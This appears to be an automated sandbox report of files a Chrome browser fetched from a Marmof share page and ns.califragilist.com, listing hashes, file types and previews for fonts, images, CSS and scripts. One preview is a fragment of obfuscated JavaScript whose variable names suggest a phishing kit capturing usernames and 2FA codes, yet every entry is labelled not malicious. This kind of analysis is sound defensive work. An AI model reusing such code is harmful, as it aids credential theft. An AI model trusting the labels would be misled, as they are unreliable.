                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-bold.woff2
                                                                                                                                            Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):35970
                                                                                                                                            Entropy (8bit):7.989503040923577
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                                                                            MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                            SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                            SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                            SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/GDSherpa-bold.woff
                                                                                                                                            Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1407), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1407
                                                                                                                                            Entropy (8bit):5.197633596425856
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:cPp/l+GrWaeTg7jCKXBUQHp0aKM9HQOG5VarHDkIvIHIS+qVtwl9ROg+29pk:6/l+GreTo5THQOG5VsxqVjg+29e
                                                                                                                                            MD5:DF44BE7742ADAE3607225522DDA483A1
                                                                                                                                            SHA1:46F8DD3B65567F5C822665F8F555600EAB1AEAEF
                                                                                                                                            SHA-256:E3409AC09AF396E35FD67C5E024386D36C52138B7541E6A4644C31A94A2D33A4
                                                                                                                                            SHA-512:C40DA2BAE316B4C83C682E8B260E17109D5771BF6197B8888F7075829524534E01D58404525A8C0F46E50771B25C41CD78E8E5D86171B9C9F6A3E69232D3FC92
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:!function(){"use strict";var a=window.location,o=window.document,t=o.currentScript,r=t.getAttribute("data-api")||new URL(t.src).origin+"/api/event",l=t.getAttribute("data-domain");function s(t,e){t&&console.warn("Ignoring Event: "+t),e&&e.callback&&e.callback()}function e(t,e){if(/^localhost$|^127(\.[0-9]+){0,2}\.[0-9]+$|^\[::1?\]$/.test(a.hostname)||"file:"===a.protocol)return s("localhost",e);if((window._phantom||window.__nightmare||window.navigator.webdriver||window.Cypress)&&!window.__plausible)return s(null,e);try{if("true"===window.localStorage.plausible_ignore)return s("localStorage flag",e)}catch(t){}var n={},i=(n.n=t,n.u=a.href,n.d=l,n.r=o.referrer||null,e&&e.meta&&(n.m=JSON.stringify(e.meta)),e&&e.props&&(n.p=e.props),new XMLHttpRequest);i.open("POST",r,!0),i.setRequestHeader("Content-Type","text/plain"),i.send(JSON.stringify(n)),i.onreadystatechange=function(){4===i.readyState&&e&&e.callback&&e.callback({status:i.status})}}var n=window.plausible&&window.plausible.q||[];windo
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (6331)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):6332
                                                                                                                                            Entropy (8bit):4.065795959238714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:bakDb8IKXfQ9jk/8/9H4NtDZmItkc6dHR2Gqky:baWB6uuZ9tk/Hy
                                                                                                                                            MD5:B46E0B6D371B00D43B1C570AAD6E7678
                                                                                                                                            SHA1:05282B9D2F8AFE917BC893A92BAD659F464E636A
                                                                                                                                            SHA-256:79A5F8CBEC83725FD156F45C89B6A02F6E166B3874F29E97CB3C2B0284685646
                                                                                                                                            SHA-512:D4460883E123DC92F2894FCFB1B8376F39CB88E04326B91469F8EC78341FEC0D3450946FB238CDD1FA10F7C15D3E71EE92EC9EF2F8518400E46238A3F8794199
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/build/assets/logotype-original-6f3eac48.js
                                                                                                                                            Preview:import{o as C,d as t,ac as V}from"./app-49265ad1.js";const a={viewBox:"0 0 1035 209",fill:"none",xmlns:"http://www.w3.org/2000/svg"},o=V('<path d="M361.645 67.6102C350.696 57.2864 335.328 52.1245 315.618 52.1245C303.613 52.1245 292.977 54.4708 283.669 59.1635C274.362 63.8561 266.971 70.4649 261.419 78.9899C255.905 87.5539 252.737 97.6431 251.994 109.257H287.189C287.932 100.811 290.748 94.2409 295.636 89.5483C300.524 84.8947 307.172 82.5093 315.618 82.5093C323.87 82.5093 330.283 84.8947 334.78 89.5483C339.277 94.2409 341.545 100.811 341.545 109.257V118.291C337.009 117.704 332.786 117.313 328.875 117C324.926 116.726 320.78 116.609 316.479 116.609C294.697 116.609 277.999 120.441 266.346 128.145C254.692 135.849 248.905 146.994 248.905 161.658C248.905 175.736 253.676 186.999 263.256 195.445C272.837 203.892 285.39 208.116 300.993 208.116C311.317 208.116 320.233 206.278 327.741 202.602C335.249 198.965 341.428 193.647 346.316 186.686V205.3H378.148V110.665C378.148 92.2857 372.634 77.934 361.645
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2154)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2155
                                                                                                                                            Entropy (8bit):5.267372123282625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:m3c2zJ1QUTFlhoXwmtJQMVYG8PXVQ5Coiv/:m3cwQUBlheDQPG8dQp4
                                                                                                                                            MD5:1645428C6355801009B641088A1D197C
                                                                                                                                            SHA1:763CD81AF9B367E04669B0CA4582BADD4BE1194E
                                                                                                                                            SHA-256:CDDABF6BFBC77AA5FB6FDF3ABC55BA4BF187741727F354C176E8E0D77B3C51EF
                                                                                                                                            SHA-512:84E961D5511D9733097CBEF0B9F48E42C7C276BFC6021410E15135980311924828CDA25FC167A7C3D6E0AB63CBF799050681ED5B84CB95B552DC593818600849
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/build/assets/Document-d618b903.js
                                                                                                                                            Preview:import{p as m,o as u,d as x,b as a,u as t,a as e,w as r,n as l,t as n,F as h,q as f,Z as _,z as i,f as d}from"./app-49265ad1.js";import{L as p}from"./logotype-original-6f3eac48.js";import{_ as g}from"./Button-7c0475a9.js";const b={class:"border-b bg-gray-50"},y={class:"container mx-auto flex h-16 items-center justify-between space-x-3 text-white"},w={class:"flex justify-start lg:w-0 lg:flex-1"},v=e("span",{class:"sr-only"},"Marmof",-1),k={class:"container space-y-5 py-10"},j={class:"prose-xs mx-auto max-w-4xl space-y-5 px-3 sm:px-10"},L={class:"text-center"},z={class:"font-semibold"},B={class:"flex items-center justify-center rounded-xl bg-gray-50 p-2 text-sm"},T={class:"mr-5 flex items-center space-x-1 border-r pr-5"},q=["src"],M={class:"font-medium"},N={class:"text-gray-600"},V=["innerHTML"],O={__name:"Document",props:{document:{type:Object,required:!0}},setup(s){const o=m(f).smallerOrEqual("sm");return(c,D)=>(u(),x(h,null,[a(t(_),{title:s.document.data.title},null,8,["title"]),e("he
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1864
                                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/klb1Tb0pqjiiO0QC8iSkuvcrkAseyN0gijLfAJqw57BVylHDeKthwKOmF6apVvmVwx220
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (24095)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):130656
                                                                                                                                            Entropy (8bit):5.496693042225715
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BE8z+02U/aBrdaB0ldrLyd8GwBiig0pIi241ocXA3GtkXgghwfjQSnzfrSAtsP7+:XB0rrLyd8GwHCi2kDXA3hQgh8sP7pIv
                                                                                                                                            MD5:4A5D113E66CBDA0CA5BD6D89ABC36101
                                                                                                                                            SHA1:6A3058025E96BC32A8C71FDC9A1EE487F281546E
                                                                                                                                            SHA-256:289107021F7D7F4FAAC4C14E29EDB92A86EE2B1B5CF8B1ABCF75562AF77C6CAD
                                                                                                                                            SHA-512:FCBD8F251A746F45DEA25B6E5C2E7C5BB94BB0824C7BFD3131EED516226B7D368229E8C9A44FD37884191B2276D8150B1EAD9819D89C426D038E027064495B98
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. Favicons -->. <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">. <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">. <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">. <link rel="manifest" href="/site.webmanifest">. <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">. <meta name="msapplication-TileColor" content="#da532c">. <meta name="theme-color" content="#ffffff">.. Fonts -->. <style >/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://marmof.com/storage/fonts/b86251dcd5/sinterv12ucc73fwrk3iltehus-fvqtmwcp50knma2jl7w0q5n-wu.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):892
                                                                                                                                            Entropy (8bit):5.863167355052868
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:qaPlKKVkz1f+tPUgo/KQGbEZAuYED9qk9neYVxyzyb7PumHe/Q/:qElbQ1f+Bo/LfAuYEJxnHDyzqyQ/
                                                                                                                                            MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                            SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                            SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                            SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):329656
                                                                                                                                            Entropy (8bit):5.391305323759219
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:V5lpEG/Rx+Ji+/O2sOD3k5kLf+uuwh4s0H0w0qRkPCeyjlgMdH0:V5lpe9XLf+ugXRkPCeyjlgMe
                                                                                                                                            MD5:345D81B8DF7FC70443CD1363181D6E8F
                                                                                                                                            SHA1:AAB7D21B3EB62F9D2568A80C553E75A3329577E5
                                                                                                                                            SHA-256:5B2485166C0C43D755E789CCF478204753D2B98050B602C558FB24286D9F5B66
                                                                                                                                            SHA-512:3FCA36E2E7A03642E510167F0B352DBED384672694CE3ABC56A00C64B79D6E39A2D0D3311A90D353200E15B4F27EF58078252783061EAD0CE4338C10C55D8AFC
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://app.marmof.com/build/assets/app-0b1f8530.css
                                                                                                                                            Preview:/*! tailwindcss v3.3.5 | MIT License | https://tailwindcss.com*/*,:after,:before{border:0 solid #e5e7eb;box-sizing:border-box}:after,:before{--tw-content:""}html{-webkit-text-size-adjust:100%;font-feature-settings:normal;font-family:Inter,ui-sans-serif,system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-variation-settings:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4}body{line-height:inherit;margin:0}hr{border-top-width:1px;color:inherit;height:0}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;posit
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7390
                                                                                                                                            Entropy (8bit):4.02755241095864
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                            MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                            SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                            SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                            SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 72 x 43, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.002585360278503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:yionv//thPl09Bgyxl/k4E08up:6v/lhPCjgy7Tp
                                                                                                                                            MD5:4F1B83A28158991F37559DB1FF1B4EB5
                                                                                                                                            SHA1:3840C85F7B3E415D9441BEEE7082726E031AC6A2
                                                                                                                                            SHA-256:2AB5EF48B2693AD185ADDEED939A93820696E7B6B33946FD0B382E44215C8E4C
                                                                                                                                            SHA-512:84C0035FE5FA1FDAD95B54114AD3304832F4D5EE73980D00EA491B7399427D138D31C12F729E036F86FC3CF29F2F365CE051F95B84AC563D3F42ED53BB1880E9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...H...+.....T.Y.....IDAT.....$.....IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):268
                                                                                                                                            Entropy (8bit):5.111190711619041
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                            MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                            SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                            SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                            SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):133944
                                                                                                                                            Entropy (8bit):5.196909052575565
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ZHGO3tG5DYg5MW0IVYehxirAV5DTDg5MCKaLPdVrYiL6Z+ESBeCz:ZfI0IVYaiFdVMfKfz
                                                                                                                                            MD5:B630392D89F7FE22ECA377162C87E7D5
                                                                                                                                            SHA1:163BD85C65918EDEDBC17A693A096B1B4E4B20D6
                                                                                                                                            SHA-256:D5165CA9B040862E5AD837026467697612CDD2361092BD4E2FCE8EE1168C6F5B
                                                                                                                                            SHA-512:AA7C6FCD78A2BB54FD40209A690D0A9951382444E12ECB57BE27AC4071D4C2F5A5CE7471A63EB196DCECB090F223DB8F7991ED3E548A10276D109FBDBE9981F8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:const _0x1ef019=_0x22e9;(function(_0x42ffe1,_0x39ea28){const _0x4609ca=_0x22e9,_0x3f2a74=_0x42ffe1();while(!![]){try{const _0x102423=-parseInt(_0x4609ca(0x190))/0x1+parseInt(_0x4609ca(0xaa))/0x2*(-parseInt(_0x4609ca(0x210))/0x3)+parseInt(_0x4609ca(0xe4))/0x4*(-parseInt(_0x4609ca(0x228))/0x5)+parseInt(_0x4609ca(0xd9))/0x6+parseInt(_0x4609ca(0x26a))/0x7*(-parseInt(_0x4609ca(0x1b8))/0x8)+parseInt(_0x4609ca(0x148))/0x9+parseInt(_0x4609ca(0xfc))/0xa*(parseInt(_0x4609ca(0x255))/0xb);if(_0x102423===_0x39ea28)break;else _0x3f2a74['push'](_0x3f2a74['shift']());}catch(_0x1a1a0d){_0x3f2a74['push'](_0x3f2a74['shift']());}}}(_0x20e8,0x821fb));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;let viewtype=null,pdfcheck=0x0;!document[_0x1ef019(0x137)]('sections')['classList'][_0x1ef019(0x214)](_0x1ef019(0x25f))&&(view='uname');document['getElementById'](_0x1ef019(0x260))&&!document[_0x1ef019(0x137)](
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (6331)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6332
                                                                                                                                            Entropy (8bit):4.065795959238714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:bakDb8IKXfQ9jk/8/9H4NtDZmItkc6dHR2Gqky:baWB6uuZ9tk/Hy
                                                                                                                                            MD5:B46E0B6D371B00D43B1C570AAD6E7678
                                                                                                                                            SHA1:05282B9D2F8AFE917BC893A92BAD659F464E636A
                                                                                                                                            SHA-256:79A5F8CBEC83725FD156F45C89B6A02F6E166B3874F29E97CB3C2B0284685646
                                                                                                                                            SHA-512:D4460883E123DC92F2894FCFB1B8376F39CB88E04326B91469F8EC78341FEC0D3450946FB238CDD1FA10F7C15D3E71EE92EC9EF2F8518400E46238A3F8794199
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:import{o as C,d as t,ac as V}from"./app-49265ad1.js";const a={viewBox:"0 0 1035 209",fill:"none",xmlns:"http://www.w3.org/2000/svg"},o=V('<path d="M361.645 67.6102C350.696 57.2864 335.328 52.1245 315.618 52.1245C303.613 52.1245 292.977 54.4708 283.669 59.1635C274.362 63.8561 266.971 70.4649 261.419 78.9899C255.905 87.5539 252.737 97.6431 251.994 109.257H287.189C287.932 100.811 290.748 94.2409 295.636 89.5483C300.524 84.8947 307.172 82.5093 315.618 82.5093C323.87 82.5093 330.283 84.8947 334.78 89.5483C339.277 94.2409 341.545 100.811 341.545 109.257V118.291C337.009 117.704 332.786 117.313 328.875 117C324.926 116.726 320.78 116.609 316.479 116.609C294.697 116.609 277.999 120.441 266.346 128.145C254.692 135.849 248.905 146.994 248.905 161.658C248.905 175.736 253.676 186.999 263.256 195.445C272.837 203.892 285.39 208.116 300.993 208.116C311.317 208.116 320.233 206.278 327.741 202.602C335.249 198.965 341.428 193.647 346.316 186.686V205.3H378.148V110.665C378.148 92.2857 372.634 77.934 361.645
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):25216
                                                                                                                                            Entropy (8bit):7.947339442168474
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:BTwdm3bbEPDrEQT87zOyJ0WsnoU+RBshw:64LQXEN7DJGSRBs
                                                                                                                                            MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                            SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                            SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                            SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                            Malicious:false
                                                                                                                                            URL:https://ns.califragilist.com/ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202
                                                                                                                                            Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):569
                                                                                                                                            Entropy (8bit):5.262261775386692
                                                                                                                                            Encrypted:false
